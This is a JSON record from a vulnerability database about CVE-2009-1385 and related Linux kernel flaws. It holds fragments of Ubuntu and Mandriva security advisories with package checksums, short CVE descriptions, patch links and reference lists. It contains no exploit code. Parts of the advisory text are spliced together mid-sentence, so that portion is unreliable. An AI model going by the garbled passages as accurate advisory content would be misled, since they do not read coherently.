http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    33574 e7b69e22af4eb33299e772769f464803\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   525474 11f2df9f8143a48c6395b3b51fbd964e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   125494 feafd7e08878356c984098698d832b72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    54864 7bf17f733cf036e0492643870dbc439a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   300874 8e5766303f17caafeffc6db2d3590487\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:  3741754 f62502087f0d206a7c43856618b63099\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_i386.deb\n      Size/MD5:   668290 36fb94764dc7b473989ab048f6f8d18d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_i386.deb\n      Size/MD5:   669404 6dcdc4988b80b0d5fad7a49eec4b3f68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_i386.deb\n      Size/MD5: 24584190 6d3e2aed50aed94ac91512384ae202a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_i386.deb\n      Size/MD5: 24662820 2f4ac0738424f2295bff2077238b126b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_i386.deb\n      Size/MD5: 10219490 e088239542d6b5caa4ba16b16c9ca5ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_i386.deb\n      Size/MD5:   761048 a2f34260d40ebb215d26ed09a45e4fe1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   218044 3cfad485954208027c844fe40bc0b838\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   174812 bf413e3a9b0cb7ab124f411ead7df97d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    30068 22dfd9b4f06187b520b67d4855f7573f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   262414 0e23c7445d3582011f9767101e4af06c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:  2007452 f84390b7d8d9f8b32c74823649b247aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   150198 05caa7db9bb38f7a42ec7ab0deb6ce47\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   184298 45df2dcc24ab9a0ffc27da827f246206\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   143542 5f862fc8f33fc1e4fbcabf78a733f1de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    34572 92451114d002c65edb0d89d053a7037e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:     5502 f39f3f824fff9020a7fa80358fdfe7b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    85990 04a9436fc3c061a9feedf8a46b79a534\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    47334 7134b0740644c5c266d52dc6d7524d68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:     8712 cbd3f0e41be40915f413ac5802a6221e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    44698 0cd8ea7ec39409e8563ab5c8c9e0248c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    14740 c7287bd485367a228246ef8502f3d175\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:  1445196 81a9314640917265a536c3894ceed78a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    44092 84aac7e95054a44fcfc589bce5129355\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    69138 e79c9c942d7e02b83359cc1fe7fe6e6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   119512 ca6a4973ba663fe06f57b52c47b3fe5b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    12672 cff86af5ddbc47b6cc5dbf6892f7f3ad\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   215242 34f3d0cfbebcc281bff8887d58a2fdd1\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    46662 b60318e129f56b4f1ace761bfcbfeb8c\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    40950 aaa3fffb7bbd0ad7dbe1a49fd48d3cb0\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    47292 4ca4fffc517a758eb5a9dc3dd69eb2c3\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    86454 ba73d27d65487eed24ef32dade5dd6f3\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    33270 96d878bfefd1667337a7d781624744fe\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   523424 3b0daef52c7fbc78f477a82d2885eedb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   125172 ca7244bb0c9ea93bf1793fafc8d93249\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    63536 a2ddb239393108fb7888391bdbcc0235\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   300334 b0fe7216d15a908a78ef5eee547efef9\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:  3033028 ae4b9666c230f663aa490e5ef7915d3c\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-13-lpia_2.6.28-13.45_lpia.deb\n      Size/MD5:   636848 685ad5fdd4837d0fc7670b40fdc55424\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-13-lpia_2.6.28-13.45_lpia.deb\n      Size/MD5: 21714272 d7a1bafe41d1f5aaf8c2b67a9171c5df\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_lpia.deb\n      Size/MD5:   761014 ebaf6b30ac3b8f5eeaa396e980eef83f\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   303684 5e037a0ca19df39904654a98a34a1bc6\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   157340 00f6f5576c21231b566afa0e2cf8fd61\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    24440 86b67b982ba9ca31546e0b2a21f0f864\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   259984 8c79116a9aeb8b302834f8e1fc266955\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:  1925766 1212a0ff61f4eda2f650f309d08be026\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   149320 40933fec799a654327e69f3e147f84d5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   184726 9c6154589bfc80b2dbddd2bcb84427de\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   143218 050db10728b271bdc222ec1af04581cb\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    34468 33f04ac2a7c747cace4c3cca47fc5c33\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:     5494 d974930a7f9c6808966eb8a90f7b6e09\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    85642 67d356fdc7853f0e2080da162297ce7a\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    47256 d814aa4d377714470bd6acc6a5e310db\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:     8708 97001eca3bfbeea54af2f8754beb6417\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    63068 f7c2bd8e6e913ccebecc87873d9c5ce3\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    14688 2bf1158a576fa810d85facf7bfd4b6d2\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:  1446758 b3a985a1ea798516afd4a7afd356a2e9\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:    43890 c37408769b4cd3de313f21dd7c1ae220\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   154914 2d14ce87eaa2b0f3ab967c818d87648b\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:   172600 716eff2706e585a3064c44ca8fae9ce9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb\n      Size/MD5:     8158 3cac29e81c3e9d2a3d905761f572e74d\n\n. \n    Local users can exploit this vulnerability to gain elevated\n    privileges. Rather, they will be\nreleased in a staggered or \"leap-frog\" fashion. \nUpdates for arm and mips will be released as they become available. (CVE-2009-1184)\n \n The exit_notify function in kernel/exit.c in the Linux kernel\n before 2.6.30-rc1 does not restrict exit signals when the\n CAP_KILL capability is held, which allows local users to send an\n arbitrary signal to a process by running a program that modifies the\n exit_signal field and then uses an exec system call to launch a setuid\n application. (CVE-2009-1337)\n \n The (1) agp_generic_alloc_page and (2) agp_generic_alloc_pages\n functions in drivers/char/agp/generic.c in the agp subsystem in the\n Linux kernel before 2.6.30-rc3 do not zero out pages that may later\n be available to a user-space process, which allows local users to\n obtain sensitive information by reading these pages. (CVE-2009-1192)\n \n The ABI in the Linux kernel 2.6.28 and earlier on s390, powerpc,\n sparc64, and mips 64-bit platforms requires that a 32-bit argument in a\n 64-bit register was properly sign extended when sent from a user-mode\n application, but cannot verify this, which allows local users to\n cause a denial of service (crash) or possibly gain privileges via a\n crafted system call.  The verification\n of md5 checksums and GPG signatures is performed automatically for you.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  \u003csecurity*mandriva.com\u003e\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.9 (GNU/Linux)\n\niD8DBQFKORHLmqjQ0CJFipgRAnzRAJ9w1CGojCsYdG001OcNmQuVonRkrwCeNMpH\nbzIigZKDE4V8120vojufik8=\n=cJ+u\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "PACKETSTORM",
        "id": "82837"
      },
      {
        "db": "PACKETSTORM",
        "id": "79774"
      },
      {
        "db": "PACKETSTORM",
        "id": "78871"
      },
      {
        "db": "PACKETSTORM",
        "id": "80419"
      },
      {
        "db": "PACKETSTORM",
        "id": "78985"
      },
      {
        "db": "PACKETSTORM",
        "id": "78500"
      }
    ],
    "trust": 2.34
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-38831",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2009-1385",
        "trust": 3.2
      },
      {
        "db": "SECUNIA",
        "id": "35265",
        "trust": 2.6
      },
      {
        "db": "BID",
        "id": "35185",
        "trust": 2.6
      },
      {
        "db": "OSVDB",
        "id": "54892",
        "trust": 2.6
      },
      {
        "db": "SECUNIA",
        "id": "35656",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "35847",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "35566",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "36131",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "35623",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "37471",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "36051",
        "trust": 1.8
      },
      {
        "db": "SECUNIA",
        "id": "36327",
        "trust": 1.8
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2009/06/03/2",
        "trust": 1.8
      },
      {
        "db": "VUPEN",
        "id": "ADV-2009-3316",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "79774",
        "trust": 0.2
      },
      {
        "db": "PACKETSTORM",
        "id": "80419",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-38831",
        "trust": 0.1
      },
      {
        "db": "VUPEN",
        "id": "2009/3316",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "82837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78871",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78985",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "78500",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "PACKETSTORM",
        "id": "82837"
      },
      {
        "db": "PACKETSTORM",
        "id": "79774"
      },
      {
        "db": "PACKETSTORM",
        "id": "78871"
      },
      {
        "db": "PACKETSTORM",
        "id": "80419"
      },
      {
        "db": "PACKETSTORM",
        "id": "78985"
      },
      {
        "db": "PACKETSTORM",
        "id": "78500"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200906-053"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "id": "VAR-200906-0598",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T19:25:52.060000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel-2.6.18-128.9AXS3",
        "trust": 0.8,
        "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=747"
      },
      {
        "title": "ChangeLog-2.6.30-rc8",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/v2.6.30/changelog-2.6.30-rc8"
      },
      {
        "title": "1835",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1835"
      },
      {
        "title": "1992",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/index.php?q=node/99\u0026errata_id=1992"
      },
      {
        "title": "RHSA-2010:0079",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2010-0079.html"
      },
      {
        "title": "RHSA-2009:1157",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2009-1157.html"
      },
      {
        "title": "RHSA-2009:1550",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2009-1550.html"
      },
      {
        "title": "RHSA-2009:1132",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2009-1132.html"
      },
      {
        "title": "RHSA-2009:1193",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2009-1193.html"
      },
      {
        "title": "RHSA-2009:1132",
        "trust": 0.8,
        "url": "https://www.jp.redhat.com/support/errata/rhsa/rhsa-2009-1132j.html"
      },
      {
        "title": "RHSA-2009:1193",
        "trust": 0.8,
        "url": "https://www.jp.redhat.com/support/errata/rhsa/rhsa-2009-1193j.html"
      },
      {
        "title": "RHSA-2009:1550",
        "trust": 0.8,
        "url": "https://www.jp.redhat.com/support/errata/rhsa/rhsa-2009-1550j.html"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20091132 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20091193 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20100079 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-source-2.6.15 vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-793-1"
      },
      {
        "title": "Debian Security Advisories: DSA-1844-1 linux-2.6.24 -- denial of service/privilege escalation",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=27df0cdf1377e17825466fd761cfdabd"
      },
      {
        "title": "VMware Security Advisories: ESX 3.5 third party update for Service Console kernel",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=f31282286ef04d7cc8eb581472e20411"
      },
      {
        "title": "VMware Security Advisories: VMware vCenter and ESX update release and vMA patch release address multiple security issues in third party components.",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=vmware_security_advisories\u0026qid=4675848a694e2124743f676a2c827ef7"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2009-1385"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-189",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-38831"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2009-001876"
      },
      {
        "db": "NVD",
        "id": "CVE-2009-1385"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "http://www.securityfocus.com/bid/35185"
      },
      {
        "trust": 2.6,
        "url": "http://secunia.com/advisories/35265"
      },
      {
        "trust": 2.6,
        "url": "http://osvdb.org/54892"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/505254/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://www.securityfocus.com/archive/1/512019/100/0/threaded"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/35566"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/35623"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/35656"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/35847"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/36051"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/36131"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/36327"
      },
      {
        "trust": 1.8,
        "url": "http://secunia.com/advisories/37471"
      },
      {
        "trust": 1.8,
        "url": "http://www.vupen.com/english/advisories/2009/3316"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2009/dsa-1844"
      },
      {
        "trust": 1.8,
        "url": "http://www.debian.org/security/2009/dsa-1865"
      },
      {
        "trust": 1.8,
        "url": "https://www.redhat.com/archives/fedora-package-announce/2009-june/msg01094.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.redhat.com/archives/fedora-package-announce/2009-june/msg01193.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.redhat.com/archives/fedora-package-announce/2009-june/msg01048.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2009:135"
      },
      {
        "trust": 1.8,
        "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2009:148"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2009-1157.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.redhat.com/support/errata/rhsa-2009-1193.html"
      },
      {
        "trust": 1.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2009-1550.html"
      },
      {
        "trust": 1.8,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2009-07/msg00004.html"
      },
      {
        "trust": 1.8,
        "url": "http://www.ubuntu.com/usn/usn-793-1"
      },
      {
        "trust": 1.8,
        "url": "http://www.openwall.com/lists/oss-security/2009/06/03/2"
      },
      {
        "trust": 1.8,
        "url": "http://wiki.rpath.com/advisories:rpsa-2009-0111"
      },
      {
        "trust": 1.8,
        "url": "http://www.intel.com/support/network/sb/cs-030543.htm"
      },
      {
        "trust": 1.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/testing/changelog-2.6.30-rc8"
      },
      {
        "trust": 1.8,
        "url": "http://www.vmware.com/security/advisories/vmsa-2009-0016.html"
      },
      {
        "trust": 1.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=502981"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11598"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a11681"
      },
      {
        "trust": 1.8,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a8340"
      },
      {
        "trust": 1.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=ea30e11970a96cfe5e32c03a29332554573b4a10"
      },
      {
        "trust": 1.7,
        "url": "http://sourceforge.net/project/shownotes.php?release_id=504022\u0026group_id=42302"
      },
      {
        "trust": 1.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1385"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-1385"
      },
      {
        "trust": 0.7,
        "url": "https://access.redhat.com/errata/rhsa-2009:1132"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2009:1193"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2009:1550"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2009-1385"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2009:1157"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/errata/rhsa-2010:0079"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1385"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1630"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1633"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1961"
      },
      {
        "trust": 0.3,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1630"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1389"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1633"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1337"
      },
      {
        "trust": 0.2,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-1192"
      },
      {
        "trust": 0.2,
